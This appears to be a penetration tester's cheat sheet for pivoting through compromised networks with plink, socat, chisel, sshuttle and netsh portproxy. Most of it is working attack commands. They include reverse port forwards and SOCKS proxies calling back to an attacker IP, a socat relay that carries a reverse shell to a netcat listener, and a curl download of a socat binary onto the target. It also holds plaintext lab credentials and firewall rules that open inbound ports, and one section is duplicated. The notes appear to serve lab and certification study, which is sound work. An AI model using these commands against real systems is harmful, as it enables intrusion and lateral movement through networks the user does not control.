cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N
To use our example from before, if we have access to 172.16.0.5 and would like to forward a connection to 172.16.0.10:80 back to port 8000 our own attacking machine (172.16.0.20), we could use this command:
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N
Note that OpenSSH private keys generated by ssh-keygen will not work with plink directly: convert them to PuTTY's .ppk format first (the authorized_keys restrictions above still limit the key to port forwarding):
puttygen KEYFILE -o OUTPUT_KEY.ppk
proxychains smbclient -L //172.16.169.217/ -U hr_admin --password=Welcome1234
proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.169.217
# -pw puts the password on the command line, visible in task manager and 4688 command-line logging on the pivot;
# newer plink versions accept -pwfile instead. This exposes the pivot's own RDP (127.0.0.1:3389) on the attacker's 127.0.0.1:9833.
PLINK: C:\Windows\Temp\plink.exe -ssh -l keks -pw "Qwlan0808<" -R 127.0.0.1:9833:127.0.0.1:3389 192.168.45.229
On Kali (inside the directory containing your Socat binary):
sudo python3 -m http.server 80
Then, on the target:
curl ATTACKING_IP/socat -o /tmp/socat-USERNAME && chmod +x /tmp/socat-USERNAME
Reverse Shell Relay
In this scenario we are using socat to create a relay for us to send a reverse shell back to our own attacking machine (as in the diagram above). First let's start a standard netcat listener on our attacking box (sudo nc -lvnp 443). Next, on the compromised server, use the following command to start the relay:
./socat tcp-l:8000 tcp:ATTACKING_IP:443 &
Port Forwarding -- Easy
The quick and easy way to set up a port forward with socat is quite simply to open up a listening port on the compromised server, and redirect whatever comes into it to the target server. For example, if the compromised server is 172.16.0.5 and the target is port 3306 of 172.16.0.10, we could use the following command (on the compromised server) to create a port forward:
# fork: serve each incoming connection in a child; reuseaddr: allow a quick restart on the same port.
# Port 33060 is reachable by anyone who can reach the compromised host, not only by us.
./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &
Port Forwarding -- Quiet
The previous technique is quick and easy, but it also opens up a port on the compromised server, which could potentially be spotted by any kind of host or network scanning. Whilst the risk is not massive, it pays to know a slightly quieter method of port forwarding with socat. This method is marginally more complex, but doesn't require opening up a port externally on the compromised server.
First of all, on our own attacking machine, we issue the following command:
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
This opens up two ports: 8000 and 8001, creating a local port relay. What goes into one of them will come out of the other. For this reason, port 8000 also has the fork and reuseaddr options set, to allow us to create more than one connection using this port forward.
Next, on the compromised relay server (172.16.0.5 in the previous example) we execute this command:
./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &
This makes a connection between our listening port 8001 on the attacking machine, and the open port of the target server. To use the fictional network from before, we could enter this command as:
./socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork &
This would create a link between port 8000 on our attacking machine, and port 80 on the intended target (172.16.0.10), meaning that we could go to localhost:8000 in our attacking machine's web browser to load the webpage served by the target: 172.16.0.10:80!
# -ddd: verbose connection logging on stderr; relay every connection on 4141 to 192.168.223.64:2222
socat -ddd TCP-LISTEN:4141,fork TCP:192.168.223.64:2222
# expose 10.4.169.215:22 on local port 22222 (without reuseaddr a fast restart can fail with "address already in use")
socat TCP-LISTEN:22222,fork TCP:10.4.169.215:22
The chisel binary has two modes: client and server. You can access the help menus for either with the command: chisel client|server --help
Reverse SOCKS Proxy:
On our own attacking box we would use a command that looks something like this:
./chisel server -p LISTEN_PORT --reverse &
This sets up a listener on your chosen LISTEN_PORT.
On the compromised host, we would use the following command:
./chisel client ATTACKING_IP:LISTEN_PORT R:socks &
Forward SOCKS Proxy:
Forward proxies are rarer than reverse proxies for the same reason as reverse shells are more common than bind shells; generally speaking, egress firewalls (handling outbound traffic) are less stringent than ingress firewalls (which handle inbound connections). That said, it's still well worth learning how to set up a forward proxy with chisel.
In many ways the syntax for this is simply reversed from a reverse proxy.
First, on the compromised host we would use:
./chisel server -p LISTEN_PORT --socks5
On our own attacking box we would then use:
./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks
Remote Port Forward:
A remote port forward is when we connect back from a compromised target to create the forward.
For a remote port forward, on our attacking machine we use the exact same command as before:
./chisel server -p LISTEN_PORT --reverse &
Once again this sets up a chisel listener for the compromised host to connect back to.
The command to connect back is slightly different this time, however:
./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &
You may recognise this as being very similar to the SSH reverse port forward method, where we specify the local port to open, the target IP, and the target port, separated by colons. Note the distinction between the LISTEN_PORT and the LOCAL_PORT. Here the LISTEN_PORT is the port that we started the chisel server on, and the LOCAL_PORT is the port we wish to open on our own attacking machine to link with the desired target port.
To use an old example, let's assume that our own IP is 172.16.0.20, the compromised server's IP is 172.16.0.5, and our target is port 22 on 172.16.0.10. The syntax for forwarding 172.16.0.10:22 back to port 2222 on our attacking machine would be as follows:
./chisel client 172.16.0.20:1337 R:2222:172.16.0.10:22 &
Connecting back to our attacking machine, functioning as a chisel server started with:
./chisel server -p 1337 --reverse &
Remote Port Forward:
A remote port forward is when we connect back from a compromised target to create the forward.
For a remote port forward, on our attacking machine we use the exact same command as before:
./chisel server -p LISTEN_PORT --reverse &
Once again this sets up a chisel listener for the compromised host to connect back to.
The command to connect back is slightly different this time, however:
./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &
You may recognise this as being very similar to the SSH reverse port forward method, where we specify the local port to open, the target IP, and the target port, separated by colons. Note the distinction between the LISTEN_PORT and the LOCAL_PORT. Here the LISTEN_PORT is the port that we started the chisel server on, and the LOCAL_PORT is the port we wish to open on our own attacking machine to link with the desired target port.
To use an old example, let's assume that our own IP is 172.16.0.20, the compromised server's IP is 172.16.0.5, and our target is port 22 on 172.16.0.10. The syntax for forwarding 172.16.0.10:22 back to port 2222 on our attacking machine would be as follows:
./chisel client 172.16.0.20:1337 R:2222:172.16.0.10:22 &
Connecting back to our attacking machine, functioning as a chisel server started with:
./chisel server -p 1337 --reverse &
This would allow us to access 172.16.0.10:22 (via SSH) by navigating to 127.0.0.1:2222.
Local Port Forward:
As with SSH, a local port forward is where we connect from our own attacking machine to a chisel server listening on a compromised target.
On the compromised target we set up a chisel server:
./chisel server -p LISTEN_PORT
We now connect to this from our attacking machine like so:
./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
For example, to connect to 172.16.0.5:8000 (the compromised host running a chisel server), forwarding our local port 2222 to 172.16.0.10:22 (our intended target), we could use:
./chisel client 172.16.0.5:8000 2222:172.16.0.10:22
Forward SOCKS Proxy:
VICTIM:
# a listening chisel server opens a port on the target (visible to scans, needs an inbound firewall hole)
./chisel server -p <% tp.frontmatter["RPORT"] %> --socks5
KALI:
./chisel client <% tp.frontmatter["RHOST"] %>:<% tp.frontmatter["RPORT"] %> <% tp.frontmatter["LPORT"] %>:socks
Reverse SOCKS Proxy:
KALI:
# --reverse lets ANY client that reaches this port open reverse forwards on our box; on a shared network add
# --auth user:pass (and the same on the client). The trailing "&" is the shell's background operator, not part of the flag.
./chisel server -p <% tp.frontmatter["LPORT"] %> --reverse --socks5&
VICTIM:
./chisel client <% tp.frontmatter["LHOST"] %>:<% tp.frontmatter["LPORT"] %> R:socks &
# sshuttle: "VPN over ssh". It rewrites the local firewall/routing (needs local sudo) so the whole subnet
# is transparently sent through user@RHOST; no proxychains needed.
sshuttle -r user@<% tp.frontmatter["RHOST"] %> <% tp.frontmatter["RHOST"] %>/24
sshuttle -r user@address --ssh-cmd "ssh -i KEYFILE" SUBNET
# -x excludes the pivot host itself, otherwise the SSH session to it would be routed into its own tunnel
sshuttle -r user@<% tp.frontmatter["RHOST"] %> <% tp.frontmatter["RHOST"] %>/24 -x <% tp.frontmatter["RHOST"] %>
This will allow sshuttle to create a connection without disrupting itself.
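# Windows port proxy (needs admin; portproxy depends on the IP Helper service running):
# listen on 192.168.223.64:2222 and relay to 10.4.223.215:4545
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.223.64 connectport=4545 connectaddress=10.4.223.215
# verify the listener (fixed: the original searched for 2223, not the 2222 we opened)
netstat -anp TCP | find "2222"
netsh interface portproxy show all
# netsh firewall exception
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.223.64 localport=2222 action=allow
# cleaning: the delete must name the same listenaddress as the add (fixed: the original used a different IP,
# which silently leaves the proxy in place)
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.223.64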
CentOS Port Enable 15420:
# runtime-only change (no --permanent), so it vanishes on reload/reboot; undo earlier with --remove-port 15420/tcp.
# The documented form is --add-port=15420/tcp.
firewall-cmd --zone=public --add-port 15420/tcp
Windows allow port 15222:
# inbound allow for the forward/chisel listener on 15222; remove it afterwards with
# netsh advfirewall firewall delete rule name="schizel"
netsh advfirewall firewall add rule name="schizel" dir=in action=allow protocol=tcp localport=15222
https://github.com/Tib3rius/Pentest-Cheatsheets https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html https://gist.github.com/jivoi/1c8fc3988af2e5b6df0d6cb188514962 https://wadcoms.github.io/ http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://www.revshells.com/